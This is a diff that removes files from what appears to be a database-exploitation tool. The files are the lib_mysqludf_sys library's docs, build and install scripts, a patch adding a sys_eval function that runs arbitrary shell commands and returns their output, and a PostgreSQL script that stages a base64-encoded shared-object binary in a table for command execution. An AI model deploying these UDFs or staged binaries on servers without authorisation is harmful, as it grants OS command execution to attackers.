-		You have been warned! If you don't see the hazard, please don't try to find it; just trust me on this.
-	</p>
-	<p>
-                If you do decide to use this library in a production environment, make sure that only specific commands can be run and file access is limited by using <a href="http://www.novell.com/documentation/apparmor/index.html">AppArmor</a>.
-	</p>
-	<a name="sys_get"></a><h2>sys_get</h2>
-	<p>
-		<code>sys_get</code> takes the name of an environment variable and returns the value of the variable.
-	</p>
-	<h3>Syntax</h3>
-<pre>sys_get([<b>arg1</b>)</pre>
-	<h3>Parameters and Return Values</h3>
-	<dl>
-		<dt><code><b>arg1</b></code></dt>
-		<dd>
-			A string that denotes the name of an environment value.			
-		</dd>
-		<dt>returns</dt>
-		<dd>
-			If the variable exists, a string containing the value of the environment variable.
-			If the variable does not exist, the function return NULL.
-		</dd>
-	</dl>
-	<h3>Installation</h3>
-	<p>
-		Place the shared library binary in an appropriate location. 
-		Log in to mysql as root or as another user with sufficient privileges, and select any database.		
-		Then, create the function using the following DDL statement:
-	</p>
-	<pre>
-CREATE FUNCTION sys_get RETURNS STRING SONAME 'lib_mysqludf_sys.so';	
-	</pre>
-	<p>
-		The function will be globally available in all databases.
-	</p>
-	<p>
-		The deinstall the function, run the following statement:
-	</p>
-	<pre>
-DROP FUNCTION sys_get;
-	</pre>
-	<h3>Examples</h3>
-	<p>
-		None yet
-	</p>
-	<h3>A Note of Caution</h3>
-	<p>
-		Be very careful in deciding whether you need this function. 
-		UDFs are available to all database users - you cannot grant EXECUTE privileges for them.
-		The variables known in the environment where mysql runs are freely accessible using this function.
-		Any user can get access to potentially secret information, such as
-		the user that is running mysqld, the path of the user's home directory etc.
-	</p>
-	<p>	
-		The function is intended for specialized MySQL applications where one needs extended 
-		control over the operating system. 
-	</p>
-	<p>
-		You have been warned! If you don't see the hazard, please don't try to find it; just trust me on this.
-	</p>
-	<a name="sys_set"></a><h2>sys_set</h2>
-	<p>
-		<code>sys_get</code> takes the name of an environment variable and returns the value of the variable.
-	</p>
-	<h3>Syntax</h3>
-<pre>sys_set([<b>arg1, arg2</b>)</pre>
-	<h3>Parameters and Return Values</h3>
-	<dl>
-		<dt><code><b>arg1</b></code></dt>
-		<dd>
-			A string that denotes the name of an environment value.			
-		</dd>
-		<dt><code><b>arg2</b></code></dt>
-		<dd>
-			An expression that contains the value that is to be assigned to the environment variable.			
-		</dd>
-		<dt>returns</dt>
-		<dd>
-			0 if the assignment or creation succeed.
-			non-zero otherwise.
-		</dd>
-	</dl>
-	<h3>Installation</h3>
-	<p>
-		Place the shared library binary in an appropriate location. 
-		Log in to mysql as root or as another user with sufficient privileges, and select any database.		
-		Then, create the function using the following DDL statement:
-	</p>
-	<pre>
-CREATE FUNCTION sys_set RETURNS STRING SONAME 'lib_mysqludf_sys.so';	
-	</pre>
-	<p>
-		The function will be globally available in all databases.
-	</p>
-	<p>
-		The deinstall the function, run the following statement:
-	</p>
-	<pre>
-DROP FUNCTION sys_set;
-	</pre>
-	<h3>Examples</h3>
-	<p>
-		None yet
-	</p>
-	<h3>A Note of Caution</h3>
-	<p>
-		Be very careful in deciding whether you need this function. 
-		UDFs are available to all database users - you cannot grant EXECUTE privileges for them.
-		This function will overwrite existing environment variables.
-	</p>
-	<p>	
-		The function is intended for specialized MySQL applications where one needs extended 
-		control over the operating system. 
-	</p>
-	<p>
-		You have been warned! If you don't see the hazard, please don't try to find it; just trust me on this.
-	</p>
-</body>
-</html

extra/mysqludfsys/lib_mysqludf_sys/linux/Makefile

@@ -1,6 +0,0 @@
-LIBDIR=/usr/lib
-
-install:
-	gcc -Wall -I/usr/include/mysql -O1 -shared src/lib_mysqludf_sys.c -o so/lib_mysqludf_sys.so
-	strip -sx so/lib_mysqludf_sys.so
-	cp -f so/lib_mysqludf_sys.so $(LIBDIR)/lib_mysqludf_sys.so

extra/mysqludfsys/lib_mysqludf_sys/windows/lib_mysqludf_sys.sql

@@ -1,33 +0,0 @@
-/*
-        lib_mysqludf_sys - a library with miscellaneous (operating) system level functions
-        Copyright (C) 2007  Roland Bouman
-        Copyright (C) 2008-2009  Roland Bouman and Bernardo Damele A. G.
-        web: http://www.mysqludf.org/
-        email: roland.bouman@gmail.com, bernardo.damele@gmail.com
-
-        This library is free software; you can redistribute it and/or
-        modify it under the terms of the GNU Lesser General Public
-        License as published by the Free Software Foundation; either
-        version 2.1 of the License, or (at your option) any later version.
-
-        This library is distributed in the hope that it will be useful,
-        but WITHOUT ANY WARRANTY; without even the implied warranty of
-        MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-        Lesser General Public License for more details.
-
-        You should have received a copy of the GNU Lesser General Public
-        License along with this library; if not, write to the Free Software
-        Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
-*/
-
-DROP FUNCTION IF EXISTS lib_mysqludf_sys_info;
-DROP FUNCTION IF EXISTS sys_get;
-DROP FUNCTION IF EXISTS sys_set;
-DROP FUNCTION IF EXISTS sys_exec;
-DROP FUNCTION IF EXISTS sys_eval;
-
-CREATE FUNCTION lib_mysqludf_sys_info RETURNS string SONAME 'lib_mysqludf_sys.dll';
-CREATE FUNCTION sys_get RETURNS string SONAME 'lib_mysqludf_sys.dll';
-CREATE FUNCTION sys_set RETURNS int SONAME 'lib_mysqludf_sys.dll';
-CREATE FUNCTION sys_exec RETURNS int SONAME 'lib_mysqludf_sys.dll';
-CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.dll';

extra/mysqludfsys/lib_mysqludf_sys_0.0.3.patch

@@ -1,354 +0,0 @@
-diff -uN lib_mysqludf_sys_0.0.2/install.sh lib_mysqludf_sys/install.sh
---- lib_mysqludf_sys_0.0.2/install.sh	1970-01-01 01:00:00.000000000 +0100
-+++ lib_mysqludf_sys/install.sh	2009-01-21 00:51:52.000000000 +0000
-@@ -0,0 +1,43 @@
-+#!/bin/bash
-+# lib_mysqludf_sys - a library with miscellaneous (operating) system level functions
-+# Copyright (C) 2007  Roland Bouman 
-+# Copyright (C) 2008-2009  Roland Bouman and Bernardo Damele A. G.
-+# web: http://www.mysqludf.org/
-+# email: mysqludfs@gmail.com, bernardo.damele@gmail.com
-+# 
-+# This library is free software; you can redistribute it and/or
-+# modify it under the terms of the GNU Lesser General Public
-+# License as published by the Free Software Foundation; either
-+# version 2.1 of the License, or (at your option) any later version.
-+# 
-+# This library is distributed in the hope that it will be useful,
-+# but WITHOUT ANY WARRANTY; without even the implied warranty of
-+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-+# Lesser General Public License for more details.
-+# 
-+# You should have received a copy of the GNU Lesser General Public
-+# License along with this library; if not, write to the Free Software
-+# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
-+
-+echo "Compiling the MySQL UDF"
-+make
-+
-+if test $? -ne 0; then
-+	echo "ERROR: You need libmysqlclient development software installed "
-+	echo "to be able to compile this UDF, on Debian/Ubuntu just run:"
-+	echo "apt-get install libmysqlclient15-dev"
-+	exit 1
-+else
-+	echo "MySQL UDF compiled successfully"
-+fi
-+
-+echo -e "\nPlease provide your MySQL root password"
-+
-+mysql -u root -p mysql < lib_mysqludf_sys.sql
-+
-+if test $? -ne 0; then
-+	echo "ERROR: unable to install the UDF"
-+	exit 1
-+else
-+	echo "MySQL UDF installed successfully"
-+fi
-Binary files lib_mysqludf_sys_0.0.2/lib_mysqludf_sys_0.0.2.tar.gz and lib_mysqludf_sys/lib_mysqludf_sys_0.0.2.tar.gz differ
-diff -uN lib_mysqludf_sys_0.0.2/lib_mysqludf_sys.c lib_mysqludf_sys/lib_mysqludf_sys.c
---- lib_mysqludf_sys_0.0.2/lib_mysqludf_sys.c	2009-01-22 12:01:55.000000000 +0000
-+++ lib_mysqludf_sys/lib_mysqludf_sys.c	2009-01-21 00:06:13.000000000 +0000
-@@ -1,8 +1,9 @@
- /* 
- 	lib_mysqludf_sys - a library with miscellaneous (operating) system level functions
- 	Copyright (C) 2007  Roland Bouman 
--	web: http://www.xcdsql.org/MySQL/UDF/ 
--	email: mysqludfs@gmail.com
-+	Copyright (C) 2008-2009  Roland Bouman and Bernardo Damele A. G.
-+	web: http://www.mysqludf.org/
-+	email: mysqludfs@gmail.com, bernardo.damele@gmail.com
- 	
- 	This library is free software; you can redistribute it and/or
- 	modify it under the terms of the GNU Lesser General Public
-@@ -51,7 +52,7 @@
- extern "C" {
- #endif
- 
--#define LIBVERSION "lib_mysqludf_sys version 0.0.2"
-+#define LIBVERSION "lib_mysqludf_sys version 0.0.3"
- 
- #ifdef __WIN__
- #define SETENV(name,value)		SetEnvironmentVariable(name,value);
-@@ -139,7 +140,7 @@
- /**
-  * sys_exec
-  * 
-- * executes the argument commandstring.
-+ * executes the argument commandstring and returns its exit status.
-  * Beware that this can be a security hazard.
-  */
- DLLEXP 
-@@ -162,6 +163,34 @@
- ,	char *error
- );
- 
-+/**
-+ * sys_eval
-+ * 
-+ * executes the argument commandstring and returns its standard output.
-+ * Beware that this can be a security hazard.
-+ */
-+DLLEXP 
-+my_bool sys_eval_init(
-+	UDF_INIT *initid
-+,	UDF_ARGS *args
-+,	char *message
-+);
-+
-+DLLEXP 
-+void sys_eval_deinit(
-+	UDF_INIT *initid
-+);
-+
-+DLLEXP 
-+char* sys_eval(
-+	UDF_INIT *initid
-+,	UDF_ARGS *args
-+,	char* result
-+,	unsigned long* length
-+,	char *is_null
-+,	char *error
-+);
-+
- 
- #ifdef	__cplusplus
- }
-@@ -336,5 +365,62 @@
- 	return system(args->args[0]);
- }
- 
-+my_bool sys_eval_init(
-+	UDF_INIT *initid
-+,	UDF_ARGS *args
-+,	char *message
-+){
-+	unsigned int i=0;
-+	if(args->arg_count == 1
-+	&& args->arg_type[i]==STRING_RESULT){
-+		return 0;
-+	} else {
-+		strcpy(
-+			message
-+		,	"Expected exactly one string type parameter"
-+		);		
-+		return 1;
-+	}
-+}
-+void sys_eval_deinit(
-+	UDF_INIT *initid
-+){
-+}
-+char* sys_eval(
-+	UDF_INIT *initid
-+,	UDF_ARGS *args
-+,	char* result
-+,	unsigned long* length
-+,	char *is_null
-+,	char *error
-+){
-+	FILE *pipe;
-+	char line[1024];
-+	unsigned long outlen, linelen;
-+
-+	result = malloc(1);
-+	outlen = 0;
-+
-+	pipe = popen(args->args[0], "r");
-+
-+	while (fgets(line, sizeof(line), pipe) != NULL) {
-+		linelen = strlen(line);
-+		result = realloc(result, outlen + linelen);
-+		strncpy(result + outlen, line, linelen);
-+		outlen = outlen + linelen;
-+	}
-+
-+	pclose(pipe);
-+
-+	if (!(*result) || result == NULL) {
-+		*is_null = 1;
-+	} else {
-+		result[outlen] = 0x00;
-+		*length = strlen(result);
-+	}
-+
-+	return result;
-+}
-+
- 
- #endif /* HAVE_DLOPEN */
-diff -uN lib_mysqludf_sys_0.0.2/lib_mysqludf_sys.html lib_mysqludf_sys/lib_mysqludf_sys.html
---- lib_mysqludf_sys_0.0.2/lib_mysqludf_sys.html	2009-01-22 12:01:55.000000000 +0000
-+++ lib_mysqludf_sys/lib_mysqludf_sys.html	2009-01-22 10:21:46.000000000 +0000
-@@ -23,7 +23,8 @@
- 		This library <code>lib_mysqludf_sys</code> contains a number of functions that allows one to interact with the operating system.		
- 	</p>
- 	<ol>
--		<li><a href="#sys_exec"><code>sys_exec</code></a> - executes an arbitrary command, and can thus be used to launch an external application.</li>
-+		<li><a href="#sys_eval"><code>sys_eval</code></a> - executes an arbitrary command, and returns it's output.</li>
-+		<li><a href="#sys_exec"><code>sys_exec</code></a> - executes an arbitrary command, and returns it's exit code.</li>
- 		<li><a href="#sys_get"><code>sys_get</code></a> - gets the value of an environment variable.</li>
- 		<li><a href="#sys_set"><code>sys_set</code></a> - create an environment variable, or update the value of an existing environment variable.</li>
- 	</ol>
-@@ -31,6 +32,72 @@
- 		Use <a href="#lib_mysqludf_sys_info"><code>lib_mysqludf_sys_info()</code></a> to obtain information about the currently installed version of <code>lib_mysqludf_sys</code>.
- 	</p>
- 	
-+
-+	<a name="sys_eval"></a><h2>sys_eval</h2>
-+	<p>
-+		<code>sys_eval</code> takes one command string argument and executes it, returning its output.
-+	</p>
-+	<h3>Syntax</h3>
-+<pre>sys_eval(<b>arg1</b>)</pre>
-+	<h3>Parameters and Return Values</h3>
-+	<dl>
-+		<dt><code><b>arg1</b></code></dt>
-+		<dd>
-+			A command string valid for the current operating system or execution environment.
-+		</dd>
-+		<dt>returns</dt>
-+		<dd>
-+			Whatever output the command pushed to the standard output stream.
-+		</dd>
-+	</dl>
-+	<h3>Installation</h3>
-+	<p>
-+		Place the shared library binary in an appropriate location. 
-+		Log in to mysql as root or as another user with sufficient privileges, and select any database.		
-+		Then, create the function using the following DDL statement:
-+	</p>
-+	<pre>
-+CREATE FUNCTION sys_eval RETURNS STRING SONAME 'lib_mysqludf_sys.so';	
-+	</pre>
-+	<p>
-+		The function will be globally available in all databases.
-+	</p>
-+	<p>
-+		The deinstall the function, run the following statement:
-+	</p>
-+	<pre>
-+DROP FUNCTION sys_eval;
-+	</pre>
-+	<h3>Examples</h3>
-+	<p>
-+		None yet
-+	</p>
-+	<h3>A Note of Caution</h3>
-+	<p>
-+		Be very careful in deciding whether you need this function. 
-+		UDFs are available to all database users - you cannot grant EXECUTE privileges for them.
-+		As the commandstring passed to <code>sys_exec</code> can do pretty much everything, 
-+		exposing the function poses a very real security hazard.
-+	</p>
-+	<p>
-+		Even for a benign user, it is possible to accidentally do a lot of damage with it.
-+		The call will be executed with the privileges of the os user that runs MySQL, 
-+		so it is entirely feasible to delete MySQL's data directory, or worse.		
-+	</p>
-+	<p>	
-+		The function is intended for specialized MySQL applications where one needs extended 
-+		control over the operating system. 
-+		Currently, we do not have UDF's for ftp, email and http, 
-+		and this function can be used to implement such functionality in case it is really necessary
-+		(datawarehouse staging areas could be a case in example).
-+	</p>
-+	<p>
-+		You have been warned! If you don't see the hazard, please don't try to find it; just trust me on this.
-+	</p>
-+	<p>
-+                If you do decide to use this library in a production environment, make sure that only specific commands can be run and file access is limited by using <a href="http://www.novell.com/documentation/apparmor/index.html">AppArmor</a>.
-+	</p>
-+
- 	<a name="sys_exec"></a><h2>sys_exec</h2>
- 	<p>
- 		<code>sys_exec</code> takes one command string argument and executes it.
-@@ -92,6 +159,9 @@
- 	<p>
- 		You have been warned! If you don't see the hazard, please don't try to find it; just trust me on this.
- 	</p>
-+	<p>
-+                If you do decide to use this library in a production environment, make sure that only specific commands can be run and file access is limited by using <a href="http://www.novell.com/documentation/apparmor/index.html">AppArmor</a>.
-+	</p>
- 	<a name="sys_get"></a><h2>sys_get</h2>
- 	<p>
- 		<code>sys_get</code> takes the name of an environment variable and returns the value of the variable.
-Binary files lib_mysqludf_sys_0.0.2/lib_mysqludf_sys.so and lib_mysqludf_sys/lib_mysqludf_sys.so differ
-diff -uN lib_mysqludf_sys_0.0.2/lib_mysqludf_sys.sql lib_mysqludf_sys/lib_mysqludf_sys.sql
---- lib_mysqludf_sys_0.0.2/lib_mysqludf_sys.sql	2009-01-22 12:01:55.000000000 +0000
-+++ lib_mysqludf_sys/lib_mysqludf_sys.sql	2009-01-22 10:21:53.000000000 +0000
-@@ -1,30 +1,33 @@
--/* 
--	lib_mysqludf_sys - a library with miscellaneous (operating) system level functions
--	Copyright (C) 2007  Roland Bouman 
--	web: http://www.xcdsql.org/MySQL/UDF/ 
--	email: mysqludfs@gmail.com
--	
--	This library is free software; you can redistribute it and/or
--	modify it under the terms of the GNU Lesser General Public
--	License as published by the Free Software Foundation; either
--	version 2.1 of the License, or (at your option) any later version.
--	
--	This library is distributed in the hope that it will be useful,
--	but WITHOUT ANY WARRANTY; without even the implied warranty of
--	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
--	Lesser General Public License for more details.
--	
--	You should have received a copy of the GNU Lesser General Public
--	License along with this library; if not, write to the Free Software
--	Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
-+/*
-+        lib_mysqludf_sys - a library with miscellaneous (operating) system level functions
-+        Copyright (C) 2007  Roland Bouman
-+        Copyright (C) 2008-2009  Roland Bouman and Bernardo Damele A. G.
-+        web: http://www.mysqludf.org/
-+        email: roland.bouman@gmail.com, bernardo.damele@gmail.com
-+
-+        This library is free software; you can redistribute it and/or
-+        modify it under the terms of the GNU Lesser General Public
-+        License as published by the Free Software Foundation; either
-+        version 2.1 of the License, or (at your option) any later version.
-+
-+        This library is distributed in the hope that it will be useful,
-+        but WITHOUT ANY WARRANTY; without even the implied warranty of
-+        MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-+        Lesser General Public License for more details.
-+
-+        You should have received a copy of the GNU Lesser General Public
-+        License along with this library; if not, write to the Free Software
-+        Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
- */
- 
--drop function lib_mysqludf_sys_info;
--drop function sys_get;
--drop function sys_set;
--drop function sys_exec;
-+DROP FUNCTION IF EXISTS lib_mysqludf_sys_info;
-+DROP FUNCTION IF EXISTS sys_get;
-+DROP FUNCTION IF EXISTS sys_set;
-+DROP FUNCTION IF EXISTS sys_exec;
-+DROP FUNCTION IF EXISTS sys_eval;
- 
--create function lib_mysqludf_sys_info returns string soname 'lib_mysqludf_sys.so';
--create function sys_get returns string soname 'lib_mysqludf_sys.so';
--create function sys_set returns int soname 'lib_mysqludf_sys.so';
--create function sys_exec returns int soname 'lib_mysqludf_sys.so';
-+CREATE FUNCTION lib_mysqludf_sys_info RETURNS string SONAME 'lib_mysqludf_sys.so';
-+CREATE FUNCTION sys_get RETURNS string SONAME 'lib_mysqludf_sys.so';
-+CREATE FUNCTION sys_set RETURNS int SONAME 'lib_mysqludf_sys.so';
-+CREATE FUNCTION sys_exec RETURNS int SONAME 'lib_mysqludf_sys.so';
-+CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.so';
-diff -uN lib_mysqludf_sys_0.0.2/Makefile lib_mysqludf_sys/Makefile
---- lib_mysqludf_sys_0.0.2/Makefile	2009-01-22 12:01:55.000000000 +0000
-+++ lib_mysqludf_sys/Makefile	2009-01-19 09:11:00.000000000 +0000
-@@ -1,6 +1,4 @@
--linux: \
-- lib_mysqludf_sys.so
-+LIBDIR=/usr/lib
- 
--lib_mysqludf_sys.so: \
-- 
--	gcc -Wall -I/opt/mysql/mysql/include -I. -shared lib_mysqludf_sys.c -o lib_mysqludf_sys.so
-+install:
-+	gcc -Wall -I/usr/include/mysql -I. -shared lib_mysqludf_sys.c -o $(LIBDIR)/lib_mysqludf_sys.so
-Common subdirectories: lib_mysqludf_sys_0.0.2/.svn and lib_mysqludf_sys/.svn

extra/postgresqludfsys/command_execution/linux.sql

@@ -1,97 +0,0 @@
--- Notes:
--- 
--- The SO compiled using PostgreSQL 8.3 C libraries differs from the one
--- compiled using PostgreSQL 8.2 C libraries
--- 
--- SO compiled using PostgreSQL 8.3 C libraries
--- lib_postgresqludf_sys.so: 8567 bytes (ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, not stripped)
--- lib_postgresqludf_sys.so: 5476 bytes (ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, stripped)
--- 
--- SO compiled using PostgreSQL 8.2 C libraries
--- lib_postgresqludf_sys.so: 8567 bytes (ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, not stripped)
--- lib_postgresqludf_sys.so: 5476 bytes (ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, stripped)
--- 
--- Little hack to compress the shared object:
--- * Compile with -O1 the shared object
--- * Use strip to remove all symbols (-s) and non-global symbols (-x)
-
-
--- Create a table with one field data-type text
-DROP TABLE IF EXISTS udftest;
-CREATE TABLE udftest(data text);
-
-
--- Insert the base64 encoded UDF in the table
-
--- SO compiled using PostgreSQL 8.3 C libraries
-INSERT INTO udftest(data) VALUES ('f0VMRgEBAQAAAAAAAAAAAAMAAwABAAAAYAYAADQAAAB8EQAAAAAAADQAIAAFACgAGQAYAAEAAAAAAAAAAAAAAAAAAAD4CQAA+AkAAAUAAAAAEAAAAQAAAAQPAAAEHwAABB8AAAgBAAAQAQAABgAAAAAQAAACAAAAGA8AABgfAAAYHwAA0AAAANAAAAAGAAAABAAAAFHldGQAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAEAAAAUuV0ZAQPAAAEHwAABB8AAPwAAAD8AAAABAAAAAEAAAARAAAAGgAAAAAAAAANAAAAAAAAAAQAAAAAAAAAAgAAAAcAAAAAAAAAFQAAABcAAAAOAAAADwAAAAwAAAATAAAACAAAAAYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAwAAAAUAAAAAAAAAEgAAABgAAAAAAAAACQAAABQAAAALAAAAFgAAAAAAAAAAAAAAAAAAABkAAAAAAAAACgAAAAAAAAAQAAAAAAAAABEAAAADAAAAEAAAAAIAAAAGAAAAiACgAQTNRFkQAAAAFgAAABgAAAAuZ1QeqGi+EqpfvhK645J8QkXV7DNeVB7YcVgcuY3xDurT7w7HDabUAAAAAAAAAAAAAAAAAAAAAJAAAAAAAAAAAAAAABIAAADLAAAAAAAAAAAAAAAQAAAAAQAAAAAAAAAAAAAAIAAAACsAAAAAAAAAAAAAACAAAACWAAAAAAAAAAAAAAASAAAAxAAAAAAAAAAAAAAAEgAAAJ4AAAAAAAAAAAAAABIAAACmAAAAAAAAAAAAAAASAAAAzAAAAAAAAAAAAAAAEgAAAIkAAAAAAAAAAAAAABIAAACCAAAAAAAAAAAAAAASAAAAswAAAAAAAAAAAAAAEgAAABwAAAAAAAAAA');
-UPDATE udftest SET data=data||'AAAACIAAACsAAAAAAAAAAAAAAASAAAAcQAAAAAAAAAAAAAAEAAAAE0AAAAmBwAACgAAABIACwBWAAAAAAkAAHwAAAASAAsAaAAAADoHAADGAQAAEgALAO4AAAAUIAAAAAAAABAA8f/bAAAADCAAAAAAAAAQAPH/XwAAADAHAAAKAAAAEgALAOIAAAAMIAAAAAAAABAA8f8QAAAA+AUAAAAAAAASAAkAFgAAALgJAAAAAAAAEgAMAD8AAAAcBwAACgAAABIACwAAX19nbW9uX3N0YXJ0X18AX2luaXQAX2ZpbmkAX19jeGFfZmluYWxpemUAX0p2X1JlZ2lzdGVyQ2xhc3NlcwBQZ19tYWdpY19mdW5jAHBnX2ZpbmZvX3N5c19leGVjAHBnX2ZpbmZvX3N5c19ldmFsAHBnX2RldG9hc3RfZGF0dW0AbWFsbG9jAG1lbWNweQBwb3BlbgByZWFsbG9jAHN0cm5jcHkAZmdldHMAcGNsb3NlAF9fc3RhY2tfY2hrX2ZhaWwAc3lzdGVtAHBmcmVlAGxpYmMuc28uNgBfZWRhdGEAX19ic3Nfc3RhcnQAX2VuZABHTElCQ18yLjEuMwBHTElCQ18yLjQAR0xJQkNfMi4wAEdMSUJDXzIuMQAAAAACAAAAAAAAAAMAAwADAAMAAwADAAMABAAFAAIAAAABAAEAAQABAAEAAQABAAEAAQABAAAAAQAEANEAAAAQAAAAAAAAAHMfaQkAAAUA8wAAABAAAAAUaWkNAAAEAP8AAAAQAAAAEGlpDQAAAwAJAQAAEAAAABFpaQ0AAAIAEwEAAAAAAAAgBwAACAAAACoHAAAIAAAANAcAAAgAAACjBwAACAAAAAggAAAIAAAAWwcAAAIPAAAZCQAAAg8AAHAHAAACCwAAlQ';
-UPDATE udftest SET data=data||'cAAAILAACNCAAAAgsAAC4JAAACCwAAhQcAAAIKAADaCAAAAgoAAEMJAAACCgAAqwcAAAIBAADwBwAAAgUAABgIAAACBwAAPggAAAIIAABUCAAAAg4AAPEIAAACDAAATwkAAAIGAABZCQAAAgkAAGkJAAACAgAA6B8AAAYDAADsHwAABgQAAPAfAAAGDQAAACAAAAcDAAAEIAAABw0AAFWJ5VOD7AToAAAAAFuBw/AZAACLk/T///+F0nQF6B4AAADowQAAAOhcAwAAWFvJw/+zBAAAAP+jCAAAAAAAAAD/owwAAABoAAAAAOng/////6MQAAAAaAgAAADp0P///wAAAAAAAAAAVYnlVlPorQAAAIHDihkAAIPsEIC7GAAAAAB1XYuD/P///4XAdA6LgxQAAACJBCTotP///4uLHAAAAI2DHP///42TGP///ynQwfgCjXD/OfFzII22AAAAAI1BAYmDHAAAAP+Ugxj///+LixwAAAA58XLmxoMYAAAAAYPEEFteXcNVieVT6C4AAACBwwsZAACD7ASLkyD///+F0nQVi5P4////hdJ0C42DIP///4kEJP/Sg8QEW13Dixwkw5BVieW44AkAAF3DVYnluNwJAABdw1WJ5bjYCQAAXcNVieVXVlOB7CwEAABloRQAAACJRfAxwItFCItAEIkEJOj8////iceLAMHoAo1w/IPoA4kEJOj8////icONRwSJdCQIiUQkBIkcJOj8////xgQzAMcEJAEAAADo/P///4mF2Pv//8dEJATUCQAAiRwk6Pz///+Jhdz7///HheD7//8AAAAA62GNvfD7//+4AAAAALn/////8q6JyPfQjXD/i53g+///AfOJXCQEi5XY+///iRQk6Pz///+Jhdj7//+JdCQIjYXw+///iUQ';
-UPDATE udftest SET data=data||'kBIuF2Pv//wOF4Pv//4kEJOj8////iZ3g+///i5Xc+///iVQkCMdEJAQABAAAjYXw+///iQQk6Pz///+FwA+Fd////4uV3Pv//4kUJOj8////i4XY+///gDgAdAuLleD7///GRBD/AL7/////i73Y+///uwAAAACJ8YnY8q730YPBA4kMJOj8////iYXU+///i73Y+///ifGJ2PKu99GNDI0MAAAAi5XU+///iQqLvdj7//+J8fKu99GD6QGJ0IPABIlMJAiLldj7//+JVCQEiQQk6Pz///+LhdT7//+LVfBlMxUUAAAAdAXo/P///4HELAQAAFteX13DVYnlg+wYiV30iXX4iX38i1UIi0IQiQQk6Pz///+Jx4sAwegCjXD8g+gDiQQk6Pz///+Jw41HBIl0JAiJRCQEiRwk6Pz////GBDMAiRwk6Pz///+JxokcJOj8////i0UIO3gQdAiJPCTo/P///4nwi130i3X4i338iexdw5CQkJBVieVWU+iN/f//gcNqFgAAi4MQ////g/j/dBmNsxD///+NtCYAAAAAg+4E/9CLBoP4/3X0W15dw1WJ5VOD7AToAAAAAFuBwzAWAADokPz//1lbycNyAAAAAQAAAAEAAAAUAAAAIwMAAGQAAAAgAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';
-UPDATE udftest SET data=data||'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';
